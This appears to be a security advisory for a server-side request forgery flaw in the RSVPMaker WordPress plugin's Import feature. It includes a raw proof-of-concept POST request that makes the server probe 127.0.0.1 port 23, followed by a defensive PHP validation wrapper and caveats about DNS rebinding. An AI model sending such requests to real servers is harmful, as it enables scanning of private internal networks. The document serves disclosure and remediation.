The Import feature of the plugin (/wp-admin/tools.php?page=rsvpmaker_export_screen) takes a URL input and calls curl on it without first validating that it points to a remote host. As a result, a high-privilege user could use that feature to scan the internal network via an SSRF attack.
Go to the Import feature (wp-admin/tools.php?page=rsvpmaker_export_screen), enter an internal URL and click 'Import'
POST /wp-json/rsvpmaker/v1/importnow HTTP/1.1
Host: 172.28.128.50
Content-Length: 52
Accept: */*
X-Requested-With: XMLHttpRequest
X-WP-Nonce: b56e26b3f8
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://172.28.128.50
Referer: http://172.28.128.50/wp-admin/tools.php?page=rsvpmaker_export_screen
Accept-Language: en-US,en;q=0.9
Cookie: [admin cookies]
Connection: close
importrsvp=http%3A%2F%2F127.0.0.1%3A23&start=0
Response: cURL error 7: Failed to connect to 127.0.0.1 port 23: Connection refused
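The fix for this class of bug is to validate the destination before fetching and to avoid echoing the transport error back to the browser (the response above reveals whether 127.0.0.1:23 is open). The following is an added example of such a defensive wrapper; it is not RSVPMaker's own code, and the function names, the `manage_options` capability check and the server-side logging are assumptions. It relies on real WordPress helpers (`wp_parse_url`, `wp_safe_remote_get`, which sets `reject_unsafe_urls` so the URL is also checked by `wp_http_validate_url`, and `WP_Error`) plus PHP's `filter_var` IP range flags.

```php
<?php
// Added example (hypothetical names; not plugin code): validate an import
// URL and fetch it without exposing internal hosts or port state.

/**
 * Return true only if $url is an http(s) URL whose host resolves solely to
 * public addresses (no loopback, private, link-local or reserved ranges).
 */
function example_is_public_http_url( $url ) {
    $parts = wp_parse_url( $url );
    if ( ! is_array( $parts ) || empty( $parts['host'] ) ) {
        return false;
    }
    // Only plain HTTP(S): curl would otherwise also accept file://, gopher://, dict:// ...
    if ( ! isset( $parts['scheme'] )
        || ! in_array( strtolower( $parts['scheme'] ), array( 'http', 'https' ), true ) ) {
        return false;
    }
    // No embedded credentials (user:pass@host).
    if ( isset( $parts['user'] ) || isset( $parts['pass'] ) ) {
        return false;
    }
    $host = trim( $parts['host'], '[]' ); // strip brackets from IPv6 literals

    // Resolve the name ourselves so a hostname cannot smuggle in a private address.
    if ( filter_var( $host, FILTER_VALIDATE_IP ) ) {
        $addresses = array( $host );
    } else {
        $records = @dns_get_record( $host, DNS_A + DNS_AAAA );
        if ( ! is_array( $records ) || empty( $records ) ) {
            return false;
        }
        $addresses = array();
        foreach ( $records as $record ) {
            if ( isset( $record['ip'] ) )   { $addresses[] = $record['ip']; }
            if ( isset( $record['ipv6'] ) ) { $addresses[] = $record['ipv6']; }
        }
    }
    // Every resolved address must be globally routable.
    foreach ( $addresses as $ip ) {
        if ( ! filter_var( $ip, FILTER_VALIDATE_IP,
                           FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE ) ) {
            return false;
        }
    }
    return true;
}

/**
 * Fetch the import URL through the WordPress HTTP API with unsafe URLs
 * rejected and redirects disabled (a redirect could otherwise point back
 * at an internal host). Only a generic error reaches the caller.
 */
function example_fetch_import_url( $url ) {
    if ( ! current_user_can( 'manage_options' ) || ! example_is_public_http_url( $url ) ) {
        return new WP_Error( 'import_url', 'Import URL must be a public http(s) address.' );
    }
    $response = wp_safe_remote_get( $url, array( 'timeout' => 10, 'redirection' => 0 ) );
    if ( is_wp_error( $response ) ) {
        // Keep cURL's message ("Connection refused", timeout, ...) out of the
        // HTTP response: it would tell the caller which internal ports answer.
        error_log( 'import fetch failed: ' . $response->get_error_message() );
        return new WP_Error( 'import_url', 'Could not fetch the import URL.' );
    }
    return wp_remote_retrieve_body( $response );
}
```

Two caveats remain even with this check: DNS can change between the validation lookup and curl's own lookup (DNS rebinding), so pinning the resolved address or resolving once and connecting by IP is stronger; and the error message returned to the browser must stay generic, because the timing and wording of connection failures are exactly what turns an SSRF into a port scanner.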